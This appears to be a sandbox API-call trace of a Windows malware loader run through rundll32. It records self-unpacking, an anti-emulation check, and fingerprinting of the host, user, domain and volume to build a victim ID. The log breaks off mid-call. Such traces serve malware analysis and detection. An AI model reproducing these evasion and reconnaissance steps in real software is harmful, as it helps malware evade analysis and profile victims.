[0205.413] GetProcAddress (hModule=0x75820000, lpProcName="AccessCheckByTypeAndAuditAlarmA") returned 0x75853d30 [0205.413] GetProcAddress (hModule=0x75820000, lpProcName="AddAccessAllowedAceEx") returned 0x7583fc30 [0205.414] GetProcAddress (hModule=0x75820000, lpProcName="EnumerateTraceGuidsEx") returned 0x75841250 [0205.414] GetProcAddress (hModule=0x75820000, lpProcName="AccessCheckAndAuditAlarmA") returned 0x75853c30 [0205.414] GetProcAddress (hModule=0x75820000, lpProcName="ChangeServiceConfig2A") returned 0x75856450 [0205.414] GetProcAddress (hModule=0x75820000, lpProcName="AddAccessAllowedAce") returned 0x7583fa40 [0205.414] GetProcAddress (hModule=0x75820000, lpProcName="EventWriteString") returned 0x77185880 [0205.414] GetProcAddress (hModule=0x75820000, lpProcName="EventActivityIdControl") returned 0x770fafe0 [0205.414] GetProcAddress (hModule=0x75820000, lpProcName="GetAce") returned 0x75842550 [0205.414] GetProcAddress (hModule=0x75820000, lpProcName="ConvertToAutoInheritPrivateObjectSecurity") returned 0x75856530 [0205.415] GetProcAddress (hModule=0x75820000, lpProcName="CloseTrace") returned 0x75840f90 [0205.415] GetProcAddress (hModule=0x75820000, lpProcName="FindFirstFreeAce") returned 0x75856e90 [0205.415] GetProcAddress (hModule=0x75820000, lpProcName="EventWrite") returned 0x770fae80 [0205.415] GetProcAddress (hModule=0x75820000, lpProcName="EventWriteEx") returned 0x770c3290 [0205.415] GetProcAddress (hModule=0x75820000, lpProcName="AddAuditAccessObjectAce") returned 0x75856230 [0205.415] GetProcAddress (hModule=0x75820000, lpProcName="EqualDomainSid") returned 0x75856df0 [0205.415] GetProcAddress (hModule=0x75820000, lpProcName="EventWriteTransfer") returned 0x771061f0 [0205.415] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x73df0000 [0205.416] GetProcAddress (hModule=0x73df0000, lpProcName="CommandLineToArgvW") returned 0x73f9bf80 [0205.416] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76fb0000 [0205.416] GetProcAddress (hModule=0x76fb0000, lpProcName="CoInitializeSecurity") returned 0x75963870 [0205.416] GetProcAddress (hModule=0x76fb0000, lpProcName="CoSetProxyBlanket") returned 0x758f60a0 [0205.416] GetProcAddress (hModule=0x76fb0000, lpProcName="CoInitializeEx") returned 0x758f88d0 [0205.416] GetProcAddress (hModule=0x76fb0000, lpProcName="CoCreateInstance") returned 0x75920060 [0205.416] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76700000 [0205.416] GetProcAddress (hModule=0x76700000, lpProcName=0x13) returned 0x767125b0 [0205.417] GetProcAddress (hModule=0x76700000, lpProcName=0x9) returned 0x76719570 [0205.417] GetProcAddress (hModule=0x76700000, lpProcName=0x14) returned 0x76712a10 [0205.417] GetProcAddress (hModule=0x76700000, lpProcName=0x6) returned 0x76719d40 [0205.417] GetProcAddress (hModule=0x76700000, lpProcName=0x2) returned 0x76719c90 [0205.417] GetProcAddress (hModule=0x76700000, lpProcName=0x19) returned 0x76715830 [0205.417] GetProcAddress (hModule=0x76700000, lpProcName=0x10) returned 0x76716200 [0205.417] VirtualProtect (in: lpAddress=0x511000, dwSize=0x18200, flNewProtect=0x20, lpflOldProtect=0xcf8dc | out: lpflOldProtect=0xcf8dc*=0x4) returned 1 [0205.420] VirtualProtect (in: lpAddress=0x52a000, dwSize=0x5000, flNewProtect=0x2, lpflOldProtect=0xcf8dc | out: lpflOldProtect=0xcf8dc*=0x4) returned 1 [0205.421] VirtualProtect (in: lpAddress=0x52f000, dwSize=0x2000, flNewProtect=0x4, lpflOldProtect=0xcf8dc | out: lpflOldProtect=0xcf8dc*=0x4) returned 1 [0205.421] VirtualProtect (in: lpAddress=0x532000, dwSize=0x600, flNewProtect=0x2, lpflOldProtect=0xcf8dc | out: lpflOldProtect=0xcf8dc*=0x4) returned 1 [0205.421] VirtualProtect (in: lpAddress=0x533000, dwSize=0xe00, flNewProtect=0x2, lpflOldProtect=0xcf8dc | out: lpflOldProtect=0xcf8dc*=0x4) returned 1 [0205.421] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0 [0205.422] HeapCreate (flOptions=0x0, dwInitialSize=0x96000, dwMaximumSize=0x0) returned 0x6200000 [0205.424] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x100) returned 0x627f5a8 [0205.459] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xb6) returned 0x627f6b0 [0205.460] GetNumberFormatA (in: Locale=0x7d3, dwFlags=0xb4, lpValue="electricmadness", lpFormat=0x0, lpNumberStr=0xcf78c, cchNumber=34 | out: lpNumberStr="") returned 0 [0205.460] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x28) returned 0x627f770 [0205.460] GetFileAttributesW (lpFileName="C:\\INTERNAL\\__empty" (normalized: "c:\\internal\\__empty")) returned 0xffffffff [0205.477] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.478] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f770 [0205.478] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a70000 [0205.479] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x144) returned 0x627f788 [0205.492] LoadLibraryA (lpLibFileName="NTDLL.dll") returned 0x770a0000 [0205.493] GetProcAddress (hModule=0x770a0000, lpProcName="RtlAddVectoredExceptionHandler") returned 0x770c3f90 [0205.493] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x511642, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0xcf804 | out: lpThreadId=0xcf804*=0xd48) returned 0x1f8 [0205.494] VirtualFree (lpAddress=0x500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.495] WaitForSingleObject (hHandle=0x1f8, dwMilliseconds=0xffffffff) returned 0x0 [0211.007] ExitProcess (uExitCode=0x0) [0211.008] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566b88 | out: hHeap=0x550000) returned 1 [0211.066] CloseHandle (hObject=0x1d4) returned 1 [0211.067] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5607a8 | out: hHeap=0x550000) returned 1 [0211.067] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569b00 | out: hHeap=0x550000) returned 1 [0211.068] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55e108 | out: hHeap=0x550000) returned 1 [0211.069] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x560448 | out: hHeap=0x550000) returned 1 [0211.069] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b740 | out: hHeap=0x550000) returned 1 [0211.070] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567d28 | out: hHeap=0x550000) returned 1 [0211.070] RtlInterlockedFlushSList (in: ListHead=0x1006deb8 | out: ListHead=0x1006deb8) returned 0x0 [0211.071] GetProcAddress (hModule=0x75250000, lpProcName="FlsFree") returned 0x75315f30 [0211.071] GetProcAddress (hModule=0x75250000, lpProcName="FlsFree") returned 0x75315f30 [0211.071] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ac40 | out: hHeap=0x550000) returned 1 [0211.071] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55f9b0 | out: hHeap=0x550000) returned 1 [0211.072] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x562318 | out: hHeap=0x550000) returned 1 [0211.073] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5603b8 | out: hHeap=0x550000) returned 1 [0211.073] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x561c58 | out: hHeap=0x550000) returned 1 [0211.073] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55a358 | out: hHeap=0x550000) returned 1 [0211.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5697e0 | out: hHeap=0x550000) returned 1 [0211.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55dde0 | out: hHeap=0x550000) returned 1 [0211.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ac68 | out: hHeap=0x550000) returned 1 [0211.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x561c98 | out: hHeap=0x550000) returned 1 [0211.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55a378 | out: hHeap=0x550000) returned 1 [0211.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568980 | out: hHeap=0x550000) returned 1 [0211.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ddb0 | out: hHeap=0x550000) returned 1 [0211.075] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b410 | out: hHeap=0x550000) returned 1 [0211.075] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5665b8 | out: hHeap=0x550000) returned 1 [0211.075] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55acb8 | out: hHeap=0x550000) returned 1 [0211.075] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ace0 | out: hHeap=0x550000) returned 1 [0211.076] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566798 | out: hHeap=0x550000) returned 1 [0211.076] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568a00 | out: hHeap=0x550000) returned 1 [0211.076] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b80 | out: hHeap=0x550000) returned 1 [0211.076] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569ba0 | out: hHeap=0x550000) returned 1 [0211.076] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5697b0 | out: hHeap=0x550000) returned 1 [0211.076] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55fe48 | out: hHeap=0x550000) returned 1 [0211.076] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569c68 | out: hHeap=0x550000) returned 1 [0211.077] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568d38 | out: hHeap=0x550000) returned 1 [0211.077] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5689e0 | out: hHeap=0x550000) returned 1 [0211.077] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55dd20 | out: hHeap=0x550000) returned 1 [0211.077] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568ba0 | out: hHeap=0x550000) returned 1 [0211.077] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55fa90 | out: hHeap=0x550000) returned 1 [0211.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55fdd8 | out: hHeap=0x550000) returned 1 [0211.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b20 | out: hHeap=0x550000) returned 1 [0211.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569810 | out: hHeap=0x550000) returned 1 [0211.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568bc0 | out: hHeap=0x550000) returned 1 [0211.078] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569990 | out: hHeap=0x550000) returned 1 [0211.079] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568a80 | out: hHeap=0x550000) returned 1 [0211.079] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55d4f0 | out: hHeap=0x550000) returned 1 [0211.079] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567b00 | out: hHeap=0x550000) returned 1 [0211.080] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b908 | out: hHeap=0x550000) returned 1 [0211.083] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566ef8 | out: hHeap=0x550000) returned 1 [0211.083] FreeLibrary (hLibModule=0x75250000) returned 1 [0211.083] FreeLibrary (hLibModule=0x75250000) returned 1 [0211.083] FreeLibrary (hLibModule=0x75250000) returned 1 [0211.083] FreeLibrary (hLibModule=0x75250000) returned 1 [0211.083] FreeLibrary (hLibModule=0x75250000) returned 1 Thread: id = 49 os_tid = 0xd3c Thread: id = 50 os_tid = 0xd48 [0205.528] GetLastError () returned 0x57 [0205.528] GetProcAddress (hModule=0x75250000, lpProcName="FlsGetValue") returned 0x752ff350 [0205.529] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x28) returned 0x569870 [0205.529] SetLastError (dwErrCode=0x57) [0205.529] GetLastError () returned 0x57 [0205.529] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x364) returned 0x58ce08 [0205.529] SetLastError (dwErrCode=0x57) [0205.529] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f770 [0205.529] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a70000 [0205.529] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x144) returned 0x627f8d8 [0205.535] LoadLibraryA (lpLibFileName="NTDLL.dll") returned 0x770a0000 [0205.535] GetProcAddress (hModule=0x770a0000, lpProcName="RtlAddVectoredExceptionHandler") returned 0x770c3f90 [0205.536] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.536] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xa) returned 0x627f770 [0205.536] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x770a0000 [0205.536] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x30) returned 0x627fa28 [0205.537] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.537] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xb) returned 0x627f770 [0205.537] LoadLibraryA (lpLibFileName="user32.dll") returned 0x753d0000 [0205.537] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x6c) returned 0x627fa60 [0205.538] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.538] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xa) returned 0x627f770 [0205.538] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x75db0000 [0205.538] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x24) returned 0x627fad8 [0205.538] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.538] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f770 [0205.539] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x75f20000 [0205.546] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x18) returned 0x627fb08 [0205.546] LoadLibraryA (lpLibFileName="SRVCLI.dll") returned 0x6f2c0000 [0205.556] GetProcAddress (hModule=0x6f2c0000, lpProcName="NetShareEnum") returned 0x6f2c4140 [0205.556] LoadLibraryA (lpLibFileName="SAMCLI.dll") returned 0x6f2a0000 [0205.564] GetProcAddress (hModule=0x6f2a0000, lpProcName="NetUserEnum") returned 0x6f2ac010 [0205.564] LoadLibraryA (lpLibFileName="NETUTILS.dll") returned 0x6f290000 [0205.572] GetProcAddress (hModule=0x6f290000, lpProcName="NetApiBufferFree") returned 0x6f2916d0 [0205.572] LoadLibraryA (lpLibFileName="LOGONCLI.dll") returned 0x6f260000 [0205.587] GetProcAddress (hModule=0x6f260000, lpProcName="NetGetDCName") returned 0x6f27de00 [0205.587] LoadLibraryA (lpLibFileName="WKSCLI.dll") returned 0x6f250000 [0205.605] GetProcAddress (hModule=0x6f250000, lpProcName="NetGetJoinInformation") returned 0x6f252e90 [0205.605] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.605] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd) returned 0x627f770 [0205.605] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x75820000 [0205.605] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xd4) returned 0x627fb28 [0205.607] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.607] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x627f770 [0205.607] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x75bb0000 [0205.607] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x2c) returned 0x627fc08 [0205.608] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.608] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x627f770 [0205.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x73df0000 [0205.608] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x8) returned 0x627fc40 [0205.608] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.608] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x627f770 [0205.608] LoadLibraryA (lpLibFileName="userenv.dll") returned 0x6f230000 [0205.618] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x4) returned 0x627fc50 [0205.618] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.618] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xb) returned 0x627f770 [0205.618] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x751f0000 [0205.625] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x10) returned 0x627fc60 [0205.625] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.625] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x20) returned 0x627fc78 [0205.626] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627fc78 | out: hHeap=0x6200000) returned 1 [0205.626] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x1ac4) returned 0x627fc78 [0205.626] GetCurrentProcessId () returned 0x9a8 [0205.626] GetTickCount64 () returned 0x2126c83 [0205.626] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x62812bc, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0205.627] GetCurrentProcess () returned 0xffffffff [0205.627] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x607edbc | out: TokenHandle=0x607edbc*=0x23c) returned 1 [0205.627] GetTokenInformation (in: TokenHandle=0x23c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x607ed9c | out: TokenInformation=0x0, ReturnLength=0x607ed9c) returned 0 [0205.627] GetLastError () returned 0x7a [0205.627] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x24) returned 0x6281748 [0205.627] GetTokenInformation (in: TokenHandle=0x23c, TokenInformationClass=0x1, TokenInformation=0x6281748, TokenInformationLength=0x24, ReturnLength=0x607edac | out: TokenInformation=0x6281748, ReturnLength=0x607edac) returned 1 [0205.627] CloseHandle (hObject=0x23c) returned 1 [0205.628] AllocateAndInitializeSid (in: pIdentifierAuthority=0x607edb4, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x607edbc | out: pSid=0x607edbc*=0x55d240*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0205.628] EqualSid (pSid1=0x6281750*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), pSid2=0x55d240*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0 [0205.628] GetCurrentThread () returned 0xfffffffe [0205.628] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x607ed90 | out: TokenHandle=0x607ed90*=0x0) returned 0 [0205.628] GetLastError () returned 0x3f0 [0205.628] GetCurrentProcess () returned 0xffffffff [0205.628] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x607ed90 | out: TokenHandle=0x607ed90*=0x23c) returned 1 [0205.628] GetTokenInformation (in: TokenHandle=0x23c, TokenInformationClass=0x2, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x607ed88 | out: TokenInformation=0x0, ReturnLength=0x607ed88) returned 0 [0205.628] GetLastError () returned 0x7a [0205.628] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x140) returned 0x6281778 [0205.628] GetTokenInformation (in: TokenHandle=0x23c, TokenInformationClass=0x2, TokenInformation=0x6281778, TokenInformationLength=0x140, ReturnLength=0x607edac | out: TokenInformation=0x6281778, ReturnLength=0x607edac) returned 1 [0205.628] AllocateAndInitializeSid (in: pIdentifierAuthority=0x607eda4, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x607edb8 | out: pSid=0x607edb8*=0x55d300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0205.628] EqualSid (pSid1=0x62817ec*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), pSid2=0x55d300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 0 [0205.628] EqualSid (pSid1=0x6281808*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), pSid2=0x55d300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 0 [0205.628] EqualSid (pSid1=0x6281814*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x72), pSid2=0x55d300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 0 [0205.628] EqualSid (pSid1=0x6281820*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x55d300*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0205.628] CloseHandle (hObject=0x23c) returned 1 [0205.629] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281778 | out: hHeap=0x6200000) returned 1 [0205.629] NetGetJoinInformation (in: lpServer=0x0, lpNameBuffer=0x607edbc, BufferType=0x607edb8 | out: lpNameBuffer=0x607edbc*="WORKGROUP", BufferType=0x607edb8) returned 0x0 [0205.640] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x14) returned 0x6281778 [0205.641] NetGetDCName (in: servername=0x0, domainname=0x0, bufptr=0x607edbc | out: bufptr=0x607edbc) returned 0x995 [0205.645] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x6281750*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x627fd8c, cchName=0x607f81c, ReferencedDomainName=0x607f598, cchReferencedDomainName=0x607f820, peUse=0x607f818 | out: Name="RDhJ0CNFevzX", cchName=0x607f81c, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x607f820, peUse=0x607f818) returned 1 [0205.647] GetSystemMetrics (nIndex=4096) returned 0 [0205.648] GetCommandLineW () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence Nikn " [0205.648] lstrlenW (lpString="C:\\Windows\\system32\\rundll32.exe") returned 32 [0205.649] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence") returned 67 [0205.649] lstrlenW (lpString="Nikn") returned 4 [0205.649] lstrcpynW (in: lpString1=0x627fea0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence", iMaxLength=260 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\\\anomoeomery.metalizedCredence" [0205.649] GetComputerNameW (in: lpBuffer=0x607e9ac, nSize=0x607ebb0 | out: lpBuffer="XC64ZB", nSize=0x607ebb0) returned 1 [0205.649] lstrcpynW (in: lpString1=0x607ebc0, lpString2="XC64ZB", iMaxLength=256 | out: lpString1="XC64ZB") returned="XC64ZB" [0205.649] GetNumberFormatA (in: Locale=0x7d3, dwFlags=0xb4, lpValue="electricmadness", lpFormat=0x0, lpNumberStr=0x607e52c, cchNumber=34 | out: lpNumberStr="¬é\x07\x06`çX") returned 0 [0205.649] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xa) returned 0x627f770 [0205.649] GetVolumeInformationW (in: lpRootPathName="c:\\\\", lpVolumeNameBuffer=0x607e5ac, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x607ebb4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x607e7ac, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x607ebb4*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0205.649] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0205.649] _vsnwprintf (in: _Buffer=0x607ebcc, _BufferCount=0xfa, _Format="%u", _ArgList=0x607e59c | out: _Buffer="203980600") returned 9 [0205.649] lstrcatW (in: lpString1="XC64ZB203980600", lpString2="RDhJ0CNFevzX" | out: lpString1="XC64ZB203980600RDhJ0CNFevzX") returned="XC64ZB203980600RDhJ0CNFevzX" [0205.649] CharUpperBuffW (in: lpsz="XC64ZB203980600RDhJ0CNFevzX", cchLength=0x1b | out: lpsz="XC64ZB203980600RDHJ0CNFEVZX") returned 0x1b [0205.650] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x21) returned 0x6281798 [0205.650] lstrlenW (lpString="䉁䑃䙅") returned 3 [0205.650] lstrlenW (lpString="䉁䑃䙅耀셐䆫\x07؇콵Q؇") returned 14 [0205.650] lstrlenW (lpString="䉁䑃䙅耀") returned 4 [0205.650] lstrlenW (lpString="䉁䑃䙅耀") returned 4 [0205.650] lstrlenW (lpString="䉁䑃䙅耀") returned 4 [0205.650] lstrlenW (lpString="䉁䑃䙅耀") returned 4 [0205.650] lstrlenW (lpString="䉁䑃䙅耀") returned 4 [0205.650] lstrlenW (lpString="䉁䑃䙅耀") returned 4 [0205.650] lstrlenW (lpString="䉁䑃䙅耀") 